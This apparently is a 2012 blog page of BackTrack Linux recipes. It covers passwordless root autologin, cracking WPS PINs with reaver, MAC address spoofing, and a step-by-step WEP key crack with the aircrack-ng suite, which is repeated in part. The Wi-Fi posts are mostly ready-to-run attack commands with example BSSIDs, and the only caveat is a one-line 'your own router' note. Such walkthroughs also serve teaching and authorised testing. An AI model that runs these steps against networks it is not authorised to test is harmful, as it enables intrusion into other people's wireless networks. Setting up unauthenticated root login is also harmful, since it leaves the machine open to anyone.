To enable BackTrack to AutoStart without password, you will need to install rungetty and a few other tweeks.
1. Install Rungetty
apt-get install rungetty
2. Now you have to edit the conf file of getty.
vi /etc/init/tty1.conf
Go down to exec /sbin/getty -9 38400 tty1, and put a # in front of it
#exec /sbin/getty -9 38400 tty1
After doing that, you need to add this line
exec /sbin/rungetty tty1 --autologin root
3. Now ur done editing this file and you need to save and exit
Press "Esc" to exit insert mode. Then type :x to save and exit
4. Now we need to create a bash file to run BackTrack automatically.
Lets view is the bash profile is there.
ls /root/.bash_profile
file does not exist. Lets create the .bash_profile file now. We are going to use "touch" as it will also include current time stamp on the newly create file.
touch ~/.bash_profile
~ is show the current directory. If you want to know the current directory, just type "pwd".
5. Since the .bash_profile file is empty, we need to edit and enter values in it.
vi /root/.bash_profile
once you are in insert mode , just add 1 line
startx
Now save and exit. There you go. Now you can start running BackTrack without login in.
Friday, August 17, 2012
Thursday, August 16, 2012
Cracking WPA with reaver (actually cracking WPS)
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
1) To view wireless interfaces
iwconfig
2) Put wireless interface into monitoring mode
airmon-ng start wlan1
3) Scan all the BSSID in the area
airodump-ng mon0
4) Using reaver to crack the WPS
reaver -i (moninterface) -b (bssid) -vv
reaver -i mon0 -b 90:94:E4:29:14:64 -vv
Sunday, August 12, 2012
Changing MAC Address
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
ifconfig (interface) up
macchanger --mac 00:11:22:33:44:55 (interface)
ifconfig (interface) up
How to crack WEP via Backtrack 5
1. Check for WLAN interface
ifconfig
iwconfig
airmon-ng
2. Start MONITORING on WLAN interface
airmon-ng start (WLAN interface)
=> airmon-ng start wlan0
3. Now a new MONITOR interface is created (mon0). Sniff existing WiFi network.
airodump-ng mon0
Now, you can see all the BSSID and also clients connecting to the AP. Choose a WEP BSSID to crack.
Keep track of the BSSID, channel and Data.
Type Ctrl+C to stop scan
4. Time to scan the specific BSSID.
Open a new Terminal.
airodump-ng -w wep -c (channel no) --bssid (bssid) (monitor interface)
=> airodump-ng -w wep -c 6 --bssid 90:32:00:00:44:11 mon0
5. Associating aireplay with mon0
Open a new Terminal.
aireplay-ng -1 0 -a (bssid) (monitoring interface)
=> aireplay-ng -1 0 -a 90:32:00:00:44:11 mon0
6. Sending Packets to the BSSID and gathering back Packets for decrypting the WEP key.
Open a new Terminal
aireplay-ng -3 -b (bssid) (monitor interface)
=> aireplay-ng -3 -b 90:32:00:00:44:11 mon0
7. Time to decrypt the WEP key.
Go back to the Terminal of Item "4" (Scanning specific BSSID).
Check to see if Beacon or Data has reached 3,000 packets. The previous Item will increase the packet amount.
Open a new Terminal
aircrack-ng wep-01.cap
The WEP key is beside the key found. Just drop the colon :
Have a good try on your own WiFi Router. Do not try it on other WiFi AP.
ifconfig
iwconfig
airmon-ng
2. Start MONITORING on WLAN interface
airmon-ng start (WLAN interface)
=> airmon-ng start wlan0
3. Now a new MONITOR interface is created (mon0). Sniff existing WiFi network.
airodump-ng mon0
Now, you can see all the BSSID and also clients connecting to the AP. Choose a WEP BSSID to crack.
Keep track of the BSSID, channel and Data.
Type Ctrl+C to stop scan
4. Time to scan the specific BSSID.
Open a new Terminal.
airodump-ng -w wep -c (channel no) --bssid (bssid) (monitor interface)
=> airodump-ng -w wep -c 6 --bssid 90:32:00:00:44:11 mon0
5. Associating aireplay with mon0
Open a new Terminal.
aireplay-ng -1 0 -a (bssid) (monitoring interface)
=> aireplay-ng -1 0 -a 90:32:00:00:44:11 mon0
6. Sending Packets to the BSSID and gathering back Packets for decrypting the WEP key.
Open a new Terminal
aireplay-ng -3 -b (bssid) (monitor interface)
=> aireplay-ng -3 -b 90:32:00:00:44:11 mon0
7. Time to decrypt the WEP key.
Go back to the Terminal of Item "4" (Scanning specific BSSID).
Check to see if Beacon or Data has reached 3,000 packets. The previous Item will increase the packet amount.
Open a new Terminal
aircrack-ng wep-01.cap
The WEP key is beside the key found. Just drop the colon :
Have a good try on your own WiFi Router. Do not try it on other WiFi AP.
Subscribe to:
Posts (Atom)